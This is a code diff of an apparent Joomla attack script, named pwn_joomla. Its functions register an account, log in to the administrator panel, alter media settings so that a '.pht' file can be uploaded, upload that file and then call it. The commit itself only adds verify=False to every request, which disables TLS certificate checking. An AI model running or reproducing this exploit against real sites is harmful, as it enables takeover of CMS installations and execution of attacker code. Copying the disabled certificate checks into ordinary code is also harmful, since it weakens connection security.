@@ -42,7 +42,7 @@ def extract_token(resp):
42
42
def try_admin_login (options , sess ):
43
43
admin_url = options .url + '/administrator/index.php'
44
44
print ('[-] Getting token for admin login' )
45
- resp = sess .get (admin_url )
45
+ resp = sess .get (admin_url , verify = False )
46
46
token = extract_token (resp )
47
47
if not token :
48
48
return False
@@ -53,7 +53,7 @@ def try_admin_login(options, sess):
53
53
'task' : 'login' ,
54
54
token : '1'
55
55
}
56
- resp = sess .post (admin_url , data = data )
56
+ resp = sess .post (admin_url , data = data , verify = False )
57
57
if 'task=profile.edit' not in resp .text :
58
58
print ('[!] Admin Login Failure!' )
59
59
return
@@ -63,7 +63,7 @@ def try_admin_login(options, sess):
63
63
def get_media_options (options , sess ):
64
64
print ("[+] Getting media options" )
65
65
media_options_url = options .url + '/administrator/index.php?option=com_config&view=component&component=com_media&path='
66
- resp = sess .get (media_options_url )
66
+ resp = sess .get (media_options_url , verify = False )
67
67
results = re .findall (r'name="([^"]+)"\s+[^>]*?value="([^"]+)"' , resp .text , re .S )
68
68
if not results :
69
69
print ("[!] Fail" )
@@ -92,7 +92,7 @@ def set_media_options(options, sess, data):
92
92
newdata ['component' ] = 'com_media'
93
93
newdata ['task' ] = 'config.save.component.apply'
94
94
config_url = options .url + '/administrator/index.php?option=com_config'
95
- resp = sess .post (config_url , data = newdata )
95
+ resp = sess .post (config_url , data = newdata , verify = False )
96
96
if 'jform[upload_extensions]' not in resp .text :
97
97
print ('[!] Maybe failed to set media options...' )
98
98
return False
@@ -125,7 +125,7 @@ def stage_two(options, sess):
125
125
def upload_file (options , sess , image_path ):
126
126
print ("[*] Uploading exploit.pht" )
127
127
url = options .url + "/administrator/index.php?option=com_media&folder="
128
- resp = sess .get (url )
128
+ resp = sess .get (url , verify = False )
129
129
match = re .search (r'form action="([^"]+)" id="uploadForm"' , resp .text , re .S )
130
130
if not match :
131
131
print ("[!] Cannot find file upload form!" )
@@ -138,12 +138,12 @@ def upload_file(options, sess, image_path):
138
138
'Filedata[]' : (filename , options .exploit , 'application/octet-stream' )
139
139
}
140
140
data = dict (folder = "" )
141
- resp = sess .post (upload_url , files = files , data = data )
141
+ resp = sess .post (upload_url , files = files , data = data , verify = False )
142
142
if filename not in resp .content :
143
143
print ("[!] Failed to upload file!" )
144
144
return False
145
145
print ("[*] Calling exploit" )
146
- resp = sess .get (exploit_url )
146
+ resp = sess .get (exploit_url , verify = False )
147
147
if options .search not in resp .content :
148
148
print ("[!] Search string not in exploit" )
149
149
print (resp )
@@ -179,7 +179,7 @@ def create_user(options, sess, token):
179
179
'form[task]' : 'user.register' ,
180
180
token : '1' ,
181
181
}
182
- return sess .post (options .url + "/index.php/component/users/?task=user.register" , data = data , allow_redirects = False )
182
+ return sess .post (options .url + "/index.php/component/users/?task=user.register" , data = data , allow_redirects = False , verify = False )
183
183
184
184
def parse_options ():
185
185
try :
@@ -198,7 +198,7 @@ def parse_options():
198
198
def pwn_joomla (options ):
199
199
sess = requests .Session ()
200
200
print ("[-] Getting token" )
201
- resp = sess .get (options .url + "/index.php/component/users/?view=login" )
201
+ resp = sess .get (options .url + "/index.php/component/users/?view=login" , verify = False )
202
202
token = extract_token (resp )
203
203
if not token :
204
204
return False
0 commit comments